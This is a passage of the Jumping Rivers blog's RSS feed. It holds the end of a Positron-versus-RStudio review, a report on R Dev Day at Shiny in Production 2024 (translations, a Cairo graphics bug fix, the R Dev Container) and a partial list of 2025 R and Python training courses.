&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/git-graph.png" alt="Complex git graph with lots of branches." class="image-center" style="width: 250px"/&gt;
&lt;h3 id="data-explorer"&gt;Data explorer&lt;/h3&gt;
&lt;p&gt;Posit have pushed this element of Positron a lot and to be fair, it is
an upgrade on the RStudio data explorer. There aren’t too many
additional features compared to RStudio - it’s probably more of a win
for Python users, who won’t be used to a data explorer. In my opinion,
the welcome new additions are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The column summary in the left hand side is a welcome addition and
does make for quicker browsing of data.&lt;/li&gt;
&lt;li&gt;The UI design in general. For instance having filters as tabs across
the top instead of above their respective column makes so much sense.&lt;/li&gt;
&lt;li&gt;Multi column sorting (!!)&lt;/li&gt;
&lt;li&gt;Larger data sets load into the explorer view much, much quicker.&lt;/li&gt;
&lt;/ul&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/data-viewer.png" alt="Positron data viewer." style="display: block; margin: auto;" /&gt;
&lt;h3 id="debugging-and-testing"&gt;Debugging and testing&lt;/h3&gt;
&lt;p&gt;The interface for R package testing has greatly improved, in that there
now is one. You can view all tests from the “Testing” section of the
sidebar whilst being able to jump to and run any tests from this
section.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/testing.png" alt="Positron testing window." style="display: block; margin: auto;" /&gt;
&lt;p&gt;There is now a completely separate interface for debugging too, with
separate sections for the environment state and call stack. Too many
times have I mistaken my debug environment for my global in RStudio!
During Posit conf, it was announced that within debug mode users can now
jump to and from C code as well though I haven’t tested this out yet.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-move-to-positron-r/debug-layout.png" alt="Positron debug window." style="display: block; margin: auto;" /&gt;
&lt;h3 id="r-package-development"&gt;R-package development&lt;/h3&gt;
&lt;p&gt;For a more comprehensive analysis of full R package development see
&lt;a href="https://blog.stephenturner.us/p/r-package-development-in-positron" rel="external"&gt;this
blog&lt;/a&gt;
by Stephen Turner.&lt;/p&gt;
&lt;h3 id="whats-not-quite-there"&gt;What’s not quite there?&lt;/h3&gt;
&lt;p&gt;For all the good there are a few things that just aren’t quite there
yet:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;So far there’s no support for RStudio addins.&lt;/li&gt;
&lt;li&gt;Most of the functions that make calls to {rstudioapi} work
(i.e. {testthat}), but there are some that don’t.&lt;/li&gt;
&lt;li&gt;The big annoying one for me at the moment is that the console doesn’t
retain code formatting and colour for the results and code once the
code has been run. There is an issue about this and a fix is coming
apparently.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="conclusion"&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;Positron is still a beta product and I’m going to be switching from
RStudio for &lt;em&gt;most&lt;/em&gt; of my programming. I would, however, say to anyone
thinking of making the switch, it’s taken me a couple weeks to get used
to the layout and I’m still not sure I have my settings nailed down. But
that will come in time.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-move-to-positron-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Dev Day @ SIP 2024</title><link>https://www.jumpingrivers.com/blog/r-dev-day-2024/</link><pubDate>Thu, 14 Nov 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-dev-day-2024/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-dev-day-2024/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-dev-day-2024/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="r-dev-day--sip-2024"&gt;R Dev Day @ SIP 2024&lt;/h1&gt;
&lt;p&gt;This year Shiny in Production hosted an &amp;ldquo;R Dev Day&amp;rdquo; split over the two days before the pre-conference workshops. R Dev Days are a new initiative of the &lt;a href="https://contributor.r-project.org/working-group" rel="external"&gt;R Contribution Working Group&lt;/a&gt;, providing an opportunity for R developers to get involved in contributing to the R Project. R Dev Day will be back at &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;SIP 2025&lt;/a&gt;, so read on to find out what participants got up to and consider coming along next year!&lt;/p&gt;
&lt;h2 id="translation"&gt;Translation&lt;/h2&gt;
&lt;p&gt;An R user&amp;rsquo;s local environment, or &lt;em&gt;locale&lt;/em&gt; sets their preferred human language. If translations are available, R will display messages, errors and warnings in that language. So one important way that the community contributes to R is to develop and maintain these translations.&lt;/p&gt;
&lt;p&gt;At the R Dev Day, Gabriela de Lima Marin learnt how to contribute translations via &lt;a href="https://translate.rx.studio/" rel="external"&gt;R&amp;rsquo;s Weblate&lt;/a&gt;, which provides a user-friendly browser interface for translation. In the first session, she worked in the conventional way, translating one string at a time. In the second session, she explored translating messages in bulk using machine translation. The second method was a little faster, but the automatic translations required careful review - sometimes they had the meaning completely wrong!&lt;/p&gt;
&lt;p&gt;Overall, Gabriela translated over 200 messages at the R Dev Day! If you want to start contributing translations, you can find links to resources on &lt;a href="https://github.com/r-devel/r-dev-day/issues/2" rel="external"&gt;issue 2&lt;/a&gt; of the r-dev-day repository.&lt;/p&gt;
&lt;h2 id="translation-dashboard"&gt;Translation dashboard&lt;/h2&gt;
&lt;p&gt;The &lt;a href="https://contributor.r-project.org/" rel="external"&gt;R Contributor site&lt;/a&gt; hosts a &lt;a href="https://contributor.r-project.org/translations-dashboard/" rel="external"&gt;translations dashboard&lt;/a&gt; to show the status of translations in the development version of R (&lt;em&gt;R-devel&lt;/em&gt;) and on Weblate. Contributors can update translations on Weblate at any time, then these translations are collated around once a quarter to update R-devel, which will become the next major/minor release of R that is usually released in April. Mario Reiman, Md Mursalin Hossain Rabbi and Murad Khalilov reviewed the open issues on the &lt;a href="https://github.com/r-devel/translations-dashboard/issues" rel="external"&gt;translation dashboard GitHub repository&lt;/a&gt; and picked two to work on - &lt;a href="https://github.com/r-devel/translations-dashboard/issues/9" rel="external"&gt;#9&lt;/a&gt;: avoid using {stringr}, to reduce the number of dependencies required by the R scripts that are run using GitHub actions to update the data sources, and &lt;a href="https://github.com/r-devel/translations-dashboard/issues/38" rel="external"&gt;#38&lt;/a&gt;: switch from using the {flexdashboard} package to using Quarto to create the dashboard. Good progress was made on both fronts during the R Dev Day and work will continue to integrate these updates.&lt;/p&gt;
&lt;p&gt;When Mario cloned the translations dashboard repository on Windows, he faced difficulties due to version-controlled files containing &lt;code&gt;?&lt;/code&gt; and &lt;code&gt;&amp;amp;&lt;/code&gt; characters. Investigating further, we discovered these were supplementary files from the R Markdown rendering, that weren&amp;rsquo;t needed any more. This lead to Heather Turner and Cam Race reviewing the GitHub actions that rendered the dashboard and adapting them to remove old files from the repository before rebuilding. They did a wider review of the GitHub actions and found several had stopped working, meaning the dashboards were not fully updating daily, when scheduled. Heather continued work on this on the train home from SIP 2024 and got them all working again by the end of the journey!&lt;/p&gt;
&lt;h2 id="bug-in-cairo-graphics-with-r"&gt;Bug in Cairo graphics with R&lt;/h2&gt;
&lt;p&gt;Bugs in base R are tracked on &lt;a href="https://bugs.r-project.org/" rel="external"&gt;R&amp;rsquo;s Bugzilla&lt;/a&gt;. There are many ways that contributors can help with reported bugs: reviewing the reports to assess if the issue is a valid bug that has not yet been fixed in R-devel; creating a simple reproducible example (or &lt;em&gt;reprex&lt;/em&gt;); debugging the R or underlying C code to analyse the root cause of the bug; discussing how to fix the bug, or proposing an update to the source code to fix a bug. For R Dev Days, a number of bug reports are selected where there is a clear next step for contributors to make.&lt;/p&gt;
&lt;p&gt;At R Dev Day @ SIP 2024, Ella Kaye and George Stagg looked at &lt;a href="https://bugs.r-project.org/show_bug.cgi?id=16721" rel="external"&gt;Bug 16721&lt;/a&gt;, which is an issue affecting Cairo graphics in R (&amp;lt; 4.5.0). In an image plot that is expected to be a full block of colour, a white stripe would appear, as in the example below:&lt;/p&gt;
&lt;img title = "An image plot ranging from 0 to 1 on the x axis and -1 to 1 on the y axis, that is almost entirely orange with a thin white vertical stripe near x = 0.9" src="ImageWithWhiteStripe.png" class="image-center" style="width: 330px;" /&gt;
&lt;p&gt;The Cairo device is implemented in the {grDevices} package, which is part of base R. Ella and George built R from source so they were able to debug both the R and C code that gets called in the reprex above. They had to troubleshoot some issues that cropped up when building R on Ella&amp;rsquo;s computer, including complications working with multiple versions of R. Sorting these issues took most of the first session, but Ella appreciated the opportunity to learn some best practices from George, as the more experienced developer. In the second session they were able to focus on the debugging. Following advice that had been given by R Core member Paul Murrell in advance of the R Dev Day, they tried &lt;em&gt;print debugging&lt;/em&gt;, i.e. adding a print statement to the source code to print out key information, while plotting a thin rectangle with &lt;code&gt;grid::grid.rect()&lt;/code&gt;. The hypothesis was that nothing would be drawn when the width was less than a pixel. They managed to create an example that plotted nothing in a Cairo graphics device, yet plotted a thin black rectangle in a Quartz device. They looked more closely at C code for the Quartz device and discovered it had a specific workaround with the comment:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;in the case of borderless rectangles snap them to pixels.&lt;br&gt;
this solves issues with image() without introducing other artifacts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So they worked on updating the C code for the Cairo device, to use the same workaround as the Quartz device. Rebuilding R with this change fixed the issue in both the original reprex and their simpler &lt;code&gt;grid.rect()&lt;/code&gt; example!&lt;/p&gt;
&lt;p&gt;In a plot twist, they discovered the Xlib device had different behaviour again, showing no issue with original reprex, but failing on the &lt;code&gt;grid.rect()&lt;/code&gt; example. Digging into the code again, they found that Quartz &lt;em&gt;rounded&lt;/em&gt; values to whole pixels, while Xlib &lt;em&gt;truncated&lt;/em&gt; values. They shared their findings on Bugzilla at the end of the R Dev Day and have since had some feedback from Paul Murrell on the next steps to get a fix accepted into base R.&lt;/p&gt;
&lt;h2 id="r-dev-container"&gt;R Dev Container&lt;/h2&gt;
&lt;p&gt;As noted above, building R on your own computer can be a big timesink for contributors. An alternative (currently only recommended for contributions that don&amp;rsquo;t involve C code) is to use the &lt;a href="https://github.com/r-devel/r-dev-env" rel="external"&gt;R Dev Container&lt;/a&gt;: a development environment for R that can be launched in the browser using GitHub Codespaces or Gitpod. This has the pre-requisites for building R already installed and is isolated from the user&amp;rsquo;s computer, avoiding many of the issues of building R on your own machine. It comes with documentation and a few helpers, so you can launch the container, get a copy of the source code for R and build R in around half an hour.&lt;/p&gt;
&lt;p&gt;Although it was designed to be used in the browser, some contributors to prefer to use the container on their own machine, to avoid using up their internet data or their free time/space allowance on GitHub Codespaces or Gitpod. Unfortunately, the Dev Container is currently built with a specific operating system and for a specific architecture, so it does not work well across platforms.&lt;/p&gt;
&lt;p&gt;At the R Dev Day, Seb Mellor looked into building the Docker container for arm64 architecture, so that it would work better on recent macOS computers. The steps for building a Docker container are specified in a Dockerfile. Previous work by others had found the existing Dockerfile would work on arm64 up until the step where it tried to install the &lt;code&gt;r-base-dev&lt;/code&gt; package from the Ubuntu repository. Seb tested the container at this point and confirmed you could still build R in the container, but it was missing the pre-installed version of R that is usually there. If we could build the container on an arm64 machine, then we could build the &lt;code&gt;r-base-dev&lt;/code&gt; package as part of the Docker build, but Seb noted arm64 machines are not available on GitHub actions for non-Enterprise customers. So he investigated some alternatives with the conclusion that an arm64 dev container may be cross compiled with additional research, or emulated with a very long build time.&lt;/p&gt;
&lt;p&gt;When Seb reported back he said he found it odd that there wasn&amp;rsquo;t an amd64 build of the &lt;code&gt;r-base-dev&lt;/code&gt; package, so Heather did some further investigation and found that we could get it from a Personal Package Archive (PPA) maintained by Michael Rutter, who compiles the packages for the official Ubuntu repository. This should solve a large part of the problem, so we have a strong lead going forward - this work is being tracked on issue &lt;a href="https://github.com/r-devel/r-dev-day/issues/2" rel="external"&gt;#112&lt;/a&gt; of the r-dev-env GitHub repository.&lt;/p&gt;
&lt;h2 id="r-dev-guide"&gt;R Dev Guide&lt;/h2&gt;
&lt;p&gt;Even from this handful of tasks that were selected for R Dev Day @ SIP 2024, you can see there is much to learn about contributing to R. One of the first initiatives of the R Contribution Working Group was to create an &lt;a href="https://contributor.r-project.org/rdevguide/" rel="external"&gt;R Development Guide&lt;/a&gt; (or &amp;ldquo;R Dev Guide&amp;rdquo; for short), to document some of the processes. Like the translations dashboard and the R Dev Container, this is a resource maintained by the contributor community.&lt;/p&gt;
&lt;p&gt;At the R Dev Day, Cam Race worked on two issues related to the R Dev Guide. In both cases, some initial work had been done by others at a previous R Dev Day, so his task was to review their contribution and continue where they left off. The first issue was to add a new section on websites relevant to R contributors, particular those under the r-project.org domain. The second issue was to improve the documentation on how to contribute to R&amp;rsquo;s documentation, including adding some examples of successfully closed bugs. Cam opened two pull requests to propose his changes (&lt;a href="https://github.com/r-devel/rdevguide/pull/186" rel="external"&gt;#186&lt;/a&gt; and &lt;a href="https://github.com/r-devel/rdevguide/pull/188" rel="external"&gt;#188&lt;/a&gt; respectively), along with another pull request to fix minor issues such as broken links.&lt;/p&gt;
&lt;h2 id="getting-involved"&gt;Getting involved&lt;/h2&gt;
&lt;p&gt;As this post shows, there is a large range of activities to get involved in at an R Dev Day, suiting different levels of skills and experience. &lt;strong&gt;R Dev Day @ SIP 2025&lt;/strong&gt; will take place on the afternoon of Tuesday 8 October and the morning of Wednesday 9 October. We&amp;rsquo;d love for next year&amp;rsquo;s R Dev Day to be bigger and better - if you&amp;rsquo;re inspired to come along, the &lt;a href="https://pretix.eu/r-contributors/r-dev-day-sip-2025/" rel="external"&gt;registration form&lt;/a&gt; is open already!&lt;/p&gt;
&lt;p&gt;Meanwhile, for news of other R contributor events and links to resources to help you get started with contributing to base R at any time, head to the R Contributor Site: &lt;a href="https://contributor.r-project.org/" rel="external"&gt;contributor.r-project.org&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-dev-day-2024/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Training Lineup for 2025: January-June</title><link>https://www.jumpingrivers.com/blog/training-lineup-2025-r-python-bayesian-statistics-machine-learning/</link><pubDate>Thu, 07 Nov 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/training-lineup-2025-r-python-bayesian-statistics-machine-learning/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/training-lineup-2025-r-python-bayesian-statistics-machine-learning/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/training-lineup-2025-r-python-bayesian-statistics-machine-learning/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;All of our public training courses for the first half of 2025 are now open for registration! Head over to the &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;public courses page&lt;/a&gt; on our website to book in and start building your programming skills in the new year! Below is a list of all of our upcoming courses with a description, bookable dates, course level and a link to the course webpage to find out more!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-training-lineup-for-2025"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;p&gt;There is still time to book yourself on to the final public courses of 2024. We are running &lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto" rel="external"&gt;Reporting with Quarto&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models" rel="external"&gt;Advanced Machine Learning with Tidymodels&lt;/a&gt;, both on the 18 of November.&lt;/p&gt;
&lt;h3 id="r-stats-and-programming"&gt;R Stats and Programming&lt;/h3&gt;
&lt;h4 id="introduction-to-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th January 2025 &amp;amp; 22nd April 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;R is a versatile language for statistical computing and graphics. In &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;this course&lt;/a&gt; you will learn the advantages of using R and how to get started. You will gain familiarity with the RStudio interface and learn the R basics. Also included is an introduction to the Tidyverse and how to use various packages for data storage, visualisation and manipulation. This course provides a great foundation to begin your R journey!&lt;/p&gt;
&lt;h4 id="data-wrangling-in-the-tidyverse"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;Data Wrangling in the Tidyverse&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 22nd January 2025 &amp;amp; 29th April 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;If you work with data, you probably spend a lot of time cleaning it and wrangling it into the correct shape. &lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;This course&lt;/a&gt; will show you how you can use R to efficiently clean and wrangle your data into a format that’s ready for analysis. You will learn about the Tidyverse, what tidy data really is, and how to practically achieve it with packages such as {dplyr}, {tidyr}, {lubridate} and {forcats}.&lt;/p&gt;
&lt;h4 id="programming-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;Programming with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 29th January 2025 &amp;amp; 20th May 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as R is that we can automate repetitive tasks. &lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and when to use them. This is a one-day intensive course on R.&lt;/p&gt;
&lt;h4 id="r-best-practices"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-best-practices/" rel="external"&gt;R Best Practices&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 12th February 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;So you can write code? Great. But can you write code which is easy to read, simple to maintain, and reproducible? Under the pressure of deadlines even the best of us can fall victim to bad-practices. In &lt;a href="https://www.jumpingrivers.com/training/course/r-best-practices/" rel="external"&gt;this course&lt;/a&gt; we motivate the importance of good-practices, and show how we can make best practices second nature by incorporating them into our normal workflow.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-ggplot2"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Data Visualisation with ggplot2&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 5th February 2025 &amp;amp; 10th June 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Want to learn how to effectively visualise your data in R using the elegant {ggplot2} package? With {ggplot2} it’s easy to customise everything from plot layouts and themes to scales, colours, and more! &lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;This course&lt;/a&gt; will comprehensively take you through basic plot types such as bar and line charts as well as cover more advanced topics such as interactive graphics with {plotly}.&lt;/p&gt;
&lt;h4 id="statistical-modelling-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;Statistical Modelling with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 26th February 2025 &amp;amp; 3rd June 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;From the very beginning, R was designed for statistical modelling. Out of the box, R makes standard statistical techniques easy. &lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental modelling techniques. We begin the day by revising hypotheses tests, before moving onto ANOVA tables and regression analysis. The class ends by looking at more sophisticated methods such as clustering and principal components analysis (PCA).&lt;/p&gt;
&lt;img src="collaboration.png" alt="Data and graphs." style="width: 500px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="machine-learning-and-bayesian-techniques"&gt;Machine Learning and Bayesian Techniques&lt;/h3&gt;
&lt;h4 id="machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels/" rel="external"&gt;Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 4th March 2025 &amp;amp; 17th June 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Machine learning is the process of applying statistical techniques to gain systematic information about a quantity of interest. We will be &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels/" rel="external"&gt;specifically focusing on&lt;/a&gt; how we can use the {tidymodels} suite of packages to implement these techniques. We cover key reasons for model fitting, such as prediction and inference, on quantitative and qualitative responses.&lt;/p&gt;
&lt;h4 id="advanced-machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models/" rel="external"&gt;Advanced Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Advanced&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 18th March 2025 &amp;amp; 24th June 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A course that builds on the material covered in our Machine Learning with Tidymodels course. We take a look at how we can fit linear discriminant analysis (LDA) models using {discrim}, assessing model reliability using V-fold cross validation, pre-processing, tree-based models &amp;amp; more. If you wish to explore the abundance of model fitting techniques {tidymodels} has to offer, then &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models/" rel="external"&gt;this course&lt;/a&gt; is certainly for you!&lt;/p&gt;
&lt;img src="spacesuit-computer.png" alt="Spacesuit and computer with graphs and numbers on." style="width: 500px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h4 id="introduction-to-bayesian-inference-using-rstan"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;Introduction to Bayesian Inference using RStan&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 13th January 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Despite the promise of big data, inferences are often limited by its systematic structure. Only by carefully modelling this structure can we take full advantage of the data. Stan is a platform for facilitating this modelling, providing an expressive modelling language to implement state-of-the-art algorithms, to draw subsequent Bayesian inferences. &lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;This course&lt;/a&gt; will teach participants how to interface with Stan through R!&lt;/p&gt;
&lt;img src="data-storage.png" alt="Servers linked up to cloud." style="width: 500px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="automatic-reporting"&gt;Automatic Reporting&lt;/h3&gt;
&lt;h4 id="reporting-with-quarto"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;Reporting with Quarto&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 25th March 2025 &amp;amp; 24th June 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Do you create interactive documents that always need to be updated when the data changes? Then &lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;this course&lt;/a&gt; is for you. In this course you will learn how to use Quarto to create high quality, dynamic, fully reproducible documents. Quarto is a multi-language open source publishing tool that allows for the creation of dynamic content with Python, R, Julia and Observable.&lt;/p&gt;
&lt;img src="reporting.png" alt="Spacesuit working on laptop in space." style="width: 500px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="python"&gt;Python&lt;/h3&gt;
&lt;h4 id="introduction-to-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;Introduction to Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 26th February 2025 &amp;amp; 13th May 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python is a general-purpose programming language popular among data scientists and statisticians. In &lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;this one-day introductory course&lt;/a&gt;, participants will learn to import, summarise and visualise their data. At each step, we avoid using “magic code”, and stress the importance of understanding what Python is doing.&lt;/p&gt;
&lt;h4 id="programming-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;Programming with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 4th March 2025 &amp;amp; 3rd June 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as Python is that we can automate repetitive tasks. &lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and how they can be applied to solve real-world data wrangling tasks.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;Data Visualisation with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 18th March 2025 &amp;amp; 17th June 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python has a number of packages for the effective creation of graphics to communicate your data insights. &lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;This course&lt;/a&gt; will examine two popular libraries for creating static 2D plots: Matplotlib and Seaborn. During the training session, we’ll cover plotting basics and customisation of figures with Matplotlib, before moving onto complex statistical visualisations with Seaborn.&lt;/p&gt;
&lt;img src="informal-python.jpg" alt="People in a room with Python logo on the board." style="width: 800px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="sql"&gt;SQL&lt;/h3&gt;
&lt;h4 id="introduction-to-sql"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/sql-introduction-postgres-aws-database/" rel="external"&gt;Introduction to SQL&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 12th February 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The Structured Query Language (SQL) defines a standard for communicating with a relational database. In this &lt;a href="https://www.jumpingrivers.com/training/course/sql-introduction-postgres-aws-database" rel="external"&gt;half-day introductory course&lt;/a&gt;, participants will learn the basic SQL syntax for data extraction, filtering and insertion. We will then discuss some considerations for working with databases on the cloud, and finish by learning basic techniques for joining tables.&lt;/p&gt;
&lt;p&gt;The course can be taken either independently or as a precursor to our Intro to SQL with R and Intro to SQL with Python courses (see below).&lt;/p&gt;
&lt;h4 id="an-introduction-to-sql-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-sql-databases-aggregation/" rel="external"&gt;An Introduction to SQL with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th April 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using databases is a fundamental part of a data scientist’s role. The main focus of &lt;a href="https://www.jumpingrivers.com/training/course/r-sql-databases-aggregation/" rel="external"&gt;this training course&lt;/a&gt; is to introduce SQL databases, write your first SQL queries, and show how R can be used to retrieve and manipulate data stored in a relational database. The course uses both the {DBI} and {dbplyr} packages.&lt;/p&gt;
